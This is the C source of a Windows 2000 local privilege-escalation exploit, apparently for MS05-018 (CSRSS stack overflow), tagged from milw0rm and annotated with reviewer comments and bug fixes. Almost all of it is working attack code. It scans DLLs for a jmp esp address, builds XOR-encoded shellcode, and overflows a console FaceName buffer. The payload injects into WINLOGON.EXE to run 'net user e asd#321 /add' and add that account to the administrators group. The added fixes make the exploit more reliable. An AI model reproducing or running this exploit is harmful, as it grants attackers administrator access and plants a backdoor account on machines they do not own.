#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment (lib,"Advapi32.lib")
  6.  
/*
 * Console state block that exploit() places in a pagefile-backed section and
 * hands to the console window with message 0x4C9 (CreateFileMappingW /
 * SendMessageW there).  The offsets in the member comments are the 32-bit
 * layout this code relies on; they agree with the member sizes (COORD = 4
 * bytes, POINT = 8 bytes), so FaceName starts at 0x20 and sizeof() is 0x420.
 *
 * exploit() does not put a font name in FaceName: it treats the 0x400 bytes
 * as a raw buffer (NOP sled, return address, shellcode).  main()'s banner
 * attributes the resulting overflow on the receiving side to MS05-018 on
 * Windows 2000 SP3/SP4; nothing in this file shows how the receiver parses
 * the field, so that attribution is the author's claim, not something
 * verifiable here.
 */
typedef struct _CONSOLE_STATE_INFO    {
      /* 0x00 */  DWORD cbSize;            /* set to sizeof(csi) by exploit() */
      /* 0x04 */  COORD ScreenBufferSize;
      /* 0x08 */  COORD WindowSize;
      /* 0x0c */  POINT WindowPosition;
      /* 0x14 */  COORD FontSize;
      /* 0x18 */  DWORD FontFamily;
      /* 0x1c */  DWORD FontWeight;
      /* 0x20 */  WCHAR FaceName[0x200];   /* 0x400 bytes; used as a byte buffer */
} CONSOLE_STATE_INFO, *PCONSOLE_STATE_INFO;
  17.  
/*
 * Parameter block appended (XOR 0x97-encoded) behind the add_user stub by
 * make_shellcode().  dw[0..4] hold the addresses of OpenProcess,
 * VirtualAllocEx, WriteProcessMemory, CreateRemoteThread and WinExec as
 * resolved in *this* process; dw[5] is the target PID; cmd is the zero-padded
 * command line (70 characters + NUL, fits in 0x50).
 *
 * NOTE(review): the add_user stub locates this block as "EY4S marker - 0x68"
 * (lea edi,[ebx-0x68]) and reads dw[] and cmd at fixed offsets 0x00..0x14 and
 * 0x18.  sizeof(address_and_cmd) must therefore stay exactly 6*4 + 0x50 =
 * 0x68 bytes and the member order must not change, or the payload silently
 * breaks.
 */
typedef struct xxx
{
    DWORD   dw[6];
    char    cmd[0x50];
}address_and_cmd;
  23.  
/*
 * First-stage 32-bit x86 decoder; this is what the jmp esp lands in after the
 * NOP sled in FaceName.  The bytes disassemble to:
 *     mov ebx,esp ; mov esi,"DYAS" ; mov edi,"DY4S" ; inc esi ; inc edi
 *     L1: inc ebx ; cmp [ebx],esi ; jne L1     ; scan up from esp for "EYAS"
 *     add ebx,4
 *     L2: xor byte [ebx],0x97 ; inc ebx ; cmp [ebx],edi ; jne L2 ; until "EY4S"
 *     db "EYAS"                                ; marker; falls into add_user
 * The markers are produced with inc so that the immediates inside the stub
 * never match themselves.  Everything between "EYAS" and decode_end_sign is
 * XOR 0x97-encoded by make_shellcode(); note a plaintext byte of 0x97 encodes
 * to 0x00, which the strlen()-based copies in make_shellcode() and exploit()
 * stop at.
 */
char decoder[]=
"\x8b\xdc"
"\xBE\x44\x59\x41\x53\x46\xBF\x44\x59\x34\x53\x47\x43\x39\x33\x75"
"\xFB\x83\xC3\x04\x80\x33\x97\x43\x39\x3B\x75\xF8\x45\x59\x41\x53";
/*
 * Second stage, stored in plaintext here and XOR-encoded by make_shellcode().
 * After the decoder ebx points at "EY4S"; the stub takes ebx-0x68 as the
 * address_and_cmd block (hard-coding its size) and, through the function
 * pointers stored there, performs roughly:
 *     h = OpenProcess(0x42A, 0, pid);            // CREATE_THREAD|VM_OPERATION|VM_WRITE|QUERY_INFORMATION
 *     p = VirtualAllocEx(h, 0, 0x100, MEM_COMMIT, PAGE_READWRITE);
 *     WriteProcessMemory(h, p, cmd, 0x100, 0);   // copies past cmd's 0x50 bytes
 *     CreateRemoteThread(h, 0, 0, WinExec, p, 0, 0);
 * i.e. it runs the `net user ... /add` command line inside the target process
 * (WINLOGON.EXE as listed by main()).  There is no clean exit after the last
 * call; execution continues into whatever follows the stub.  The account it
 * creates uses fixed credentials:
 */
//user=e
//pass=asd#321
char add_user[]=
"\x90\x90\x90\x90\x90\x90\x90\x8D\x7b\x98\xFF\x77\x14\x6A\x00\x68"
"\x2A\x04\x00\x00\xFF\x17\x8B\xD8\x6A\x04\x68\x00\x10\x00\x00\x68"
"\x00\x01\x00\x00\x6A\x00\x53\xFF\x57\x04\x8B\xF0\x6A\x00\x68\x00"
"\x01\x00\x00\x8D\x47\x18\x50\x56\x53\xFF\x57\x08\x33\xC0\x50\x50"
"\x56\xFF\x77\x10\x50\x50\x53\xFF\x57\x0C";
/* Terminator the decoder loop stops at; appended unencoded after the block. */
char decode_end_sign[]="EY4S";
/* Assembled payload: decoder | encoded add_user | encoded address_and_cmd | "EY4S". */
char sc[0x200];

/* Title of the console allocated in main(); used to FindWindow() its window. */
char    szConsoleTitle[256];
  40.  
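/*
 * Scan a fixed list of system DLLs, as mapped into *this* process, for the
 * byte pair FF E4 (jmp esp) and return the address of the first hit, or 0 if
 * none is found.  exploit() embeds the address in the payload as the return
 * address used in another process, so it is only meaningful if that process
 * has the same module at the same base -- this code simply assumes so (the
 * banner targets Windows 2000, where system DLL bases were fixed).
 *
 * Fix vs. the pasted version: the original loop set done = TRUE in the else
 * branch of the byte compare (a leftover from a removed __try/__except), so
 * it inspected only ptr[0..1] of each module and could never find anything.
 * The scan is now bounded by SizeOfImage from the module's PE header instead
 * of relying on an access violation to end it.
 */
DWORD search_jmpesp(void)
{
    static const char *szDLL[] = {"ntdll.dll",
                                  "kernel32.dll",
                                  "user32.dll",
                                  "gdi32.dll",
                                  "winsrv.dll",
                                  "csrsrv.dll",
                                  "basesrv.dll"};
    size_t i;

    for (i = 0; i < sizeof(szDLL) / sizeof(szDLL[0]); i++) {
        HMODULE h = LoadLibrary(szDLL[i]);
        const BYTE *base;
        const IMAGE_DOS_HEADER *dos;
        const IMAGE_NT_HEADERS *nt;
        DWORD size, y;
        DWORD addr = 0;

        if (h == NULL)
            continue;   /* the CSRSS-side DLLs may not load into an ordinary process */
        printf("[+] start search \"FF E4\" in %s\n", szDLL[i]);

        base = (const BYTE *)h;
        dos = (const IMAGE_DOS_HEADER *)base;
        if (dos->e_magic != IMAGE_DOS_SIGNATURE) {
            FreeLibrary(h);
            continue;
        }
        nt = (const IMAGE_NT_HEADERS *)(base + dos->e_lfanew);
        if (nt->Signature != IMAGE_NT_SIGNATURE) {
            FreeLibrary(h);
            continue;
        }
        size = nt->OptionalHeader.SizeOfImage;

        /* y+1 must stay inside the mapped image */
        for (y = 0; y + 1 < size; y++) {
            if (base[y] == 0xFF && base[y + 1] == 0xE4) {
                addr = (DWORD)(ULONG_PTR)(base + y);
                printf("[+] found \"FF E4\"(jmp esp) in %X[%s]\n", addr, szDLL[i]);
                break;
            }
        }
        FreeLibrary(h);   /* the address is only a number from here on */
        if (addr)
            return addr;
    }
    return 0;
}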
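/*
 * Assemble the payload into the global sc[]:
 *     decoder | XOR(0x97) add_user stub | XOR(0x97) address_and_cmd | "EY4S"
 * followed by a terminating NUL.  The address_and_cmd block carries the
 * addresses of OpenProcess / VirtualAllocEx / WriteProcessMemory /
 * CreateRemoteThread / WinExec as resolved in this process, dwTargetPid, and
 * the `net user` command line.  Returns FALSE if kernel32 or one of those
 * exports cannot be resolved, or if the result would not fit in sc[].
 *
 * Fixes vs. the pasted version:
 *  - the XOR loop covered sizeof(add_user), i.e. including the terminating
 *    NUL, which became 0x97; the following strcat(sc, add_user) then read
 *    past the end of add_user[] (undefined behaviour that only "worked" when
 *    the linker happened to put a zero byte right after the array).  Every
 *    piece is now copied with an explicit length.
 *  - add_user[] is encoded into sc[] instead of in place, so a second call
 *    does not flip the stub back to plaintext.
 *  - the kernel32 module handle is released.
 * Unchanged caveat: a plaintext byte equal to the 0x97 key encodes to 0x00,
 * which a strlen()-based consumer of sc[] stops at.
 */
BOOL make_shellcode(DWORD dwTargetPid)
{
    static const char *names[5] = {"OpenProcess", "VirtualAllocEx",
                                   "WriteProcessMemory", "CreateRemoteThread",
                                   "WinExec"};
    HMODULE hKernel32;
    address_and_cmd aac;
    size_t dec_len = strlen(decoder);           /* decoder contains no 0x00 byte */
    size_t stub_len = sizeof(add_user) - 1;     /* drop the C-string NUL */
    size_t end_len = strlen(decode_end_sign);
    size_t pos, i;

    /* everything plus a terminating NUL must fit in sc[] */
    if (dec_len + stub_len + sizeof(aac) + end_len + 1 > sizeof(sc))
        return FALSE;

    hKernel32 = LoadLibrary("kernel32.dll");
    if (!hKernel32)
        return FALSE;
    for (i = 0; i < 5; i++) {
        aac.dw[i] = (DWORD)(ULONG_PTR)GetProcAddress(hKernel32, names[i]);
        if (!aac.dw[i]) {
            FreeLibrary(hKernel32);
            return FALSE;
        }
    }
    FreeLibrary(hKernel32);
    aac.dw[5] = dwTargetPid;

    /* zero-pad cmd: the stub passes 0x100 bytes starting here to WriteProcessMemory */
    memset(aac.cmd, 0, sizeof(aac.cmd));
    /* 70 characters + NUL; fits in cmd[0x50] */
    strcpy(aac.cmd, "cmd /c net user e asd#321 /add && net localgroup administrators e /add");

    memcpy(sc, decoder, dec_len);
    pos = dec_len;
    for (i = 0; i < stub_len; i++)
        sc[pos + i] = (char)(((const unsigned char *)add_user)[i] ^ 0x97);
    pos += stub_len;
    for (i = 0; i < sizeof(aac); i++)
        sc[pos + i] = (char)(((const unsigned char *)&aac)[i] ^ 0x97);
    pos += sizeof(aac);
    memcpy(sc + pos, decode_end_sign, end_len);
    pos += end_len;
    sc[pos] = '\0';

    return TRUE;
}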
  119.  
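/*
 * Build the CONSOLE_STATE_INFO block, copy it into a pagefile-backed section
 * and hand the section handle to the console window hwnd with message 0x4C9.
 * FaceName is filled as a raw byte buffer:
 *     [0x00..0x57] 0x90 sled | [0x58..0x5B] jmp esp address |
 *     [0x5C..0x7B] 0x90 sled | [0x7C..]     payload built by make_shellcode()
 * The remaining fields are the fixed values the original author used; their
 * meaning to the receiving side is not established by this file.  dwPid is
 * the process the payload injects into.
 *
 * Fixes vs. the pasted version:
 *  - the 0x20-byte NOP run after the address was appended with strcat(); a
 *    0x00 byte inside the address would have ended the "string" early and
 *    the NOPs would have overwritten part of the address.  It is written with
 *    memset at a fixed offset instead.
 *  - the payload was copied with strlen(sc), which stops at the first 0x00 in
 *    the encoded stream (any plaintext byte equal to the 0x97 key).  All of
 *    sc[] is copied now; it fits in FaceName and its tail is zero like the
 *    rest of the struct.
 *  - the local view is unmapped once the data is in the section, and the
 *    section handle is closed on the MapViewOfFile failure path.  After
 *    SendMessageW the handle is deliberately left open, as in the original:
 *    whether the receiver still needs it once SendMessageW returns is not
 *    shown here.
 *  - GetLastError() is a DWORD: printed with %lu.
 */
void exploit(HWND hwnd, DWORD dwPid)
{
    HANDLE              hSection;
    LPVOID              view;
    BYTE               *face;
    size_t              index;
    DWORD               dwJMP;
    CONSOLE_STATE_INFO  csi;

    memset(&csi, 0, sizeof(csi));
    csi.cbSize = sizeof(csi);
    csi.ScreenBufferSize.X = 0x0050;
    csi.ScreenBufferSize.Y = 0x012c;
    csi.WindowSize.X = 0x0050;
    csi.WindowSize.Y = 0x0019;
    csi.WindowPosition.x = 0x58;
    csi.WindowPosition.y = 0x58;
    csi.FontSize.X = 0;
    csi.FontSize.Y = 0xc;
    csi.FontFamily = 0x36;
    csi.FontWeight = 0x190;

    dwJMP = search_jmpesp();
    if (!dwJMP) {
        printf("[-] search FF E4 failed.\n");
        return;
    }
    if (!make_shellcode(dwPid))
        return;

    face = (BYTE *)csi.FaceName;
    index = 0x58 + sizeof(dwJMP) + 0x20;          /* 0x7C: payload start */
    if (index + sizeof(sc) > sizeof(csi.FaceName)) {
        printf("[-] payload does not fit in FaceName.\n");
        return;
    }
    memset(face, 0x90, 0x58);
    memcpy(face + 0x58, &dwJMP, sizeof(dwJMP));
    memset(face + 0x58 + sizeof(dwJMP), 0x90, 0x20);
    memcpy(face + index, sc, sizeof(sc));

    /* pagefile-backed section exactly the size of the struct */
    hSection = CreateFileMappingW(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, csi.cbSize, NULL);
    if (!hSection) {
        printf("[-] CreateFileMapping failed:%lu\n", GetLastError());
        return;
    }
    printf("[+] CreateFileMapping OK!\n");
    view = MapViewOfFile(hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0);
    if (!view) {
        printf("[-] MapViewOfFile failed:%lu\n", GetLastError());
        CloseHandle(hSection);
        return;
    }
    printf("[+] MapViewOfFile OK!\n");
    memcpy(view, &csi, csi.cbSize);
    UnmapViewOfFile(view);     /* the data lives in the section, not in our view */

    printf("[+] Send Exploit!\n");
    SendMessageW(hwnd, 0x4C9, (WPARAM)hSection, 0);
}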
  178.  
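/* Print the PID of every WINLOGON.EXE process; prints nothing on snapshot failure. */
static void list_winlogon_pids(void)
{
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe;

    if (hSnapshot == INVALID_HANDLE_VALUE) {
        printf("[-] CreateToolhelp32Snapshot failed:%lu\n", GetLastError());
        return;
    }
    pe.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hSnapshot, &pe)) {
        do {
            if (_stricmp(pe.szExeFile, "WINLOGON.EXE") == 0)
                printf("[+] PID=%lu Process=%s\n", pe.th32ProcessID, pe.szExeFile);
        } while (Process32Next(hSnapshot, &pe));
    }
    CloseHandle(hSnapshot);
}

/*
 * Entry point.  Usage: <exe> <pid>.
 *
 * Without an argument, lists the PIDs of WINLOGON.EXE (the intended injection
 * target for the payload's `net user ... /add`) and exits with status 1.
 * With a PID: detaches from the current console, allocates a fresh one, finds
 * that console's window by class and title, and calls exploit() on it.  The
 * FreeConsole/AllocConsole step makes this process the owner of the console
 * whose window receives the message -- presumably so the receiving side can
 * resolve the section handle against this process; the server side is not
 * shown in this file, so treat that as an assumption.
 *
 * Fixes vs. the pasted version: int return with a non-zero status when no
 * exploit was attempted; snapshot and Process32First results checked; the
 * PID is parsed with strtoul so garbage is rejected instead of becoming 0;
 * HWND printed with %p; GetLastError() printed with %lu.
 */
int main(int argc, char **argv)
{
    DWORD   dwRet;
    HWND    hwnd;
    DWORD   dwPid = 0;

    printf( "MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0\n"
            "Affect: Windows 2000 sp3/sp4 (all language)\n"
            "Coded by eyas <eyas at xfocus.org>\n"
            "http://www.xfocus.net\n\n");

    if (argc == 2) {
        char *end = NULL;
        unsigned long v = strtoul(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || v == 0) {
            printf("[-] invalid pid \"%s\"\n", argv[1]);
            return 1;
        }
        dwPid = (DWORD)v;
    } else {
        printf("Usage: %s pid\n\n", argv[0]);
        list_winlogon_pids();
        return 1;
    }

    if (!FreeConsole())
        printf("[-] FreeConsole failed:%lu\n", GetLastError());
    else {
        /* NOTE(review): no console is attached here; this line may be lost */
        printf("[+] FreeConsole ok.\n");
        if (!AllocConsole())
            printf("[-] AllocConsole failed:%lu\n", GetLastError());
        else
            printf("[+] AllocConsole ok.\n");
    }

    /* the new console's title is the key used to find its window */
    dwRet = GetConsoleTitle(szConsoleTitle, sizeof(szConsoleTitle));
    if (!dwRet) {
        printf("[-] Get Console Title failed.\n");
        return 1;
    }
    printf("[+] Get Console Title OK:\"%s\"\n", szConsoleTitle);

    hwnd = FindWindow("ConsoleWindowClass", szConsoleTitle);
    if (!hwnd) {
        printf("[-] can't found hwnd!\n");
        return 1;
    }
    printf("[+] bingo! found hwnd=%p\n", (void *)hwnd);

    exploit(hwnd, dwPid);
    printf("[+] Done.\n");
    return 0;
}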
  249.  
  250. // milw0rm.com [2005-09-06]